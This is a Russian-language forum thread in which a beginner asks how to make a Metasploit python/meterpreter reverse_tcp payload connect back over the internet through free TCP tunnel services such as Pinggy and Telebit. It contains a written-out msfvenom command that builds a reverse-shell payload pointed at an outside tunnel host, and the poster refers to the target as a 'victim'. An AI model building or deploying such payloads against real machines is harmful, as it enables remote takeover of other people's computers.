• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Metasploit через Pinggy

29.10.2024
9
0
BIT
63
Доброго времени суток!
Сегодня хотел-бы затронуть свою проблему,
Только недавно начал изучать Metasploit Framework,
и после того как освоил её в Локальной сети, решил попробовать уже и через Интернет,
Но столкнулся с проблемой проброса портов через роутер, и решил воспользоваться Ngrok
Но для пользования TCP туннелем нужно привязать кредитную, или дебетовую карту. Что мне делать совсем не хочется
И нашёл "Аналог" который называется "Pinggy" (НЕ РЕКЛАМА)
Там можно бесплатно сделать TCP туннель без привязки карты, но при указании URL в lhost пэйлоада Python/Meterpreter/Reverse_Tcp
Выдаёт ошибку:
1730804321770.png

Декодировав код пэйлоада я понял что в s.recv(4) поступает b''
В консоли туннеля пишет:
1730804496249.png

Подскажите как можно исправить данную ошибку, или возможные альнотративы, ИЛИ даже как можно создать TCP туннель в ngrok без привязки карты
Буду блогадарен за любую помощь!
 

Exited3n

Red Team
10.05.2022
731
259
BIT
678
Доброго времени суток!
Сегодня хотел-бы затронуть свою проблему,
Только недавно начал изучать Metasploit Framework,
и после того как освоил её в Локальной сети, решил попробовать уже и через Интернет,
Но столкнулся с проблемой проброса портов через роутер, и решил воспользоваться Ngrok
Но для пользования TCP туннелем нужно привязать кредитную, или дебетовую карту. Что мне делать совсем не хочется
И нашёл "Аналог" который называется "Pinggy" (НЕ РЕКЛАМА)
Там можно бесплатно сделать TCP туннель без привязки карты, но при указании URL в lhost пэйлоада Python/Meterpreter/Reverse_Tcp
Выдаёт ошибку:
Посмотреть вложение 77406
Декодировав код пэйлоада я понял что в s.recv(4) поступает b''
В консоли туннеля пишет:
Посмотреть вложение 77407
Подскажите как можно исправить данную ошибку, или возможные альнотративы, ИЛИ даже как можно создать TCP туннель в ngrok без привязки карты
Буду блогадарен за любую помощь!


 
29.10.2024
9
0
BIT
63

Здравствуйте, решил попробовать Telebit, сможете подсказать как им пользоваться.
Если быть чуть конкретнее то что писать в msfconsole, LHOST=0.0.0.0? и LPORT=(любой свободный порт)?
С PAYLOAD вроде разобрался: msfvenom -p python/meterpreter/reverse_tcp lhost=telebit.cloud lport=8888 -f raw > payload.py
Но всё-же metasploit-framework не видит жертву
 
29.10.2024
9
0
BIT
63
Здравствуйте, решил попробовать Telebit, сможете подсказать как им пользоваться.
Если быть чуть конкретнее то что писать в msfconsole, LHOST=0.0.0.0? и LPORT=(любой свободный порт)?
С PAYLOAD вроде разобрался: msfvenom -p python/meterpreter/reverse_tcp lhost=telebit.cloud lport=8888 -f raw > payload.py
Но всё-же metasploit-framework не видит жертву
telebit.cloud даётся при telebit tcp (порт)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!